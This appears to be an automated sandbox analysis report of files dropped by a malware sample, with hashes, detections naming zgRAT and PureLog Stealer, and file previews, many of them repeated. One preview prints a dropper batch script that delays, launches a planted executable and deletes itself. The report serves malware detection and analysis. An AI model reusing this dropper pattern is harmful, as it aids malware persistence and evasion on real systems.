SHA1: E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
SHA-256: 3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
SHA-512: 72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
Malicious: true
Yara Hits:
• Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 63%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H......................T.......*........................................0..........(.... ........8........E....M.......)...\...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....{.......:...........8v...r...ps....z*~....:.... ....~....{....9....& ....8........~....(@...~....(D... ....?.... ....~....{....:w...& ....8l...~....(8... .... .... ....s....~....(<....... ....~....{....9,...& ....8!......

Process: C:\Users\user\Desktop\WinPerfcommon.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 26
Entropy (8bit): 3.95006375643621
Encrypted: false
SSDEEP: 3:ggPYV:rPYV
MD5: 187F488E27DB4AF347237FE461A079AD
SHA1: 6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256: 255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512: 89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious: true
Preview: [ZoneTransfer]....ZoneId=0

Process: C:\Recovery\SgrmBroker.exe
File Type: CSV text
Category: dropped
Size (bytes): 847
Entropy (8bit): 5.354334472896228
Encrypted: false
SSDEEP: 24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5: 9F9FA9EFE67E9BBD165432FA39813EEA
SHA1: 6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256: 4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512: F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

Process: C:\Program Files\Adobe\StartMenuExperienceHost.exe
File Type: CSV text
Category: dropped
Size (bytes): 847
Entropy (8bit): 5.354334472896228
Encrypted: false
SSDEEP: 24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
MD5: 9F9FA9EFE67E9BBD165432FA39813EEA
SHA1: 6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
SHA-256: 4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
SHA-512: F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

Process: C:\Users\user\Desktop\WinPerfcommon.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1396
Entropy (8bit): 5.350961817021757
Encrypted: false
SSDEEP: 24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5: EBB3E33FCCEC5303477CB59FA0916A28
SHA1: BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256: DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512: 663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious: true
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

Process: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1830
Entropy (8bit): 5.3661116947161815
Encrypted: false
SSDEEP: 48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktJtpaqZ4vwmj0K
MD5: C2E0F17D6A14A9837FE55EE183305037
SHA1: EB56F87DAE280A52D91E88872777FDEEB2E1DF76
SHA-256: 8D444C9F4CB992629221443E699471F7D71BA2F0FFFC1F9BEBBA9D2F18371D47
SHA-512: F4C96FF497F0AF4756F6A65350B2F9CF3AE54CEF07E38FDF31AC653765F731256D2625E287C6AC3471A87297CC51EF4D37E857C7F51D4735681B20F0B376D855
Malicious: false
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicK

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 1.1940658735648508
Encrypted: false
SSDEEP: 3:Nlllulbnolz:NllUc
MD5: F23953D4A58E404FCB67ADD0C45EB27A
SHA1: 2D75B5CACF2916C66E440F19F6B3B21DFD289340
SHA-256: 16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
SHA-512: B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
Malicious: false
Preview: @...e................................................@..........

Process: C:\Users\user\Desktop\WinPerfcommon.exe
File Type: DOS batch file, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 215
Entropy (8bit): 5.320179041964886
Encrypted: false
SSDEEP: 6:hCijTg3Nou1SV+DE7gCvE5C4SKOZG1wkn23fJ5G:HTg9uYDE7gufxU
MD5: EC4A01BFD3E61C649FB5C15129C5C269
SHA1: B1D3FE7F0FD7D2B1EEC031B523821FB2987D8350
SHA-256: 0CC7FCFAFCA6A78B119C060AFD8229E80B340792F8526DC39764C73B14541B5B
SHA-512: A0652433BE68EE99223B916B7526CD6BF755C8789472C28EC7F7575E1D8A8A1FFC2ECA55B31993296469D5E4E3B4B85A554D049485203602E381ABA8A576AC53
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
Preview: @echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\BUc8lPV5KF.bat"

Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Sat Jan 11 16:45:14 2025, 1st section name ".debug$S"
Category: dropped
Size (bytes): 1956
Entropy (8bit): 4.556018538440599
Encrypted: false
SSDEEP: 24:HKO9/OGRktDfHYwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:K8kxHKhmMluOulajfqXSfbNtmh1Z
MD5: D851788211453B0F1546E9E0981C1503
SHA1: F4E8E6AB4FBF4187FEB5B1EB5363E718206B10B8
SHA-256: 8ED2DCE6BA3C5D53B9915978164FBDEA0EF6FF45D174B4F6714C5EA6D08B36F6
SHA-512: 4492ED265DFEC2F0B52231B96ABC21460775E557D63AD230435F415A7799115FF97DE19A6A40CF44A8EC1FFA88C7A267D3A0E974C3573D6456AF22323A856D3B
Malicious: false
Preview: L......g.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESA39D.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
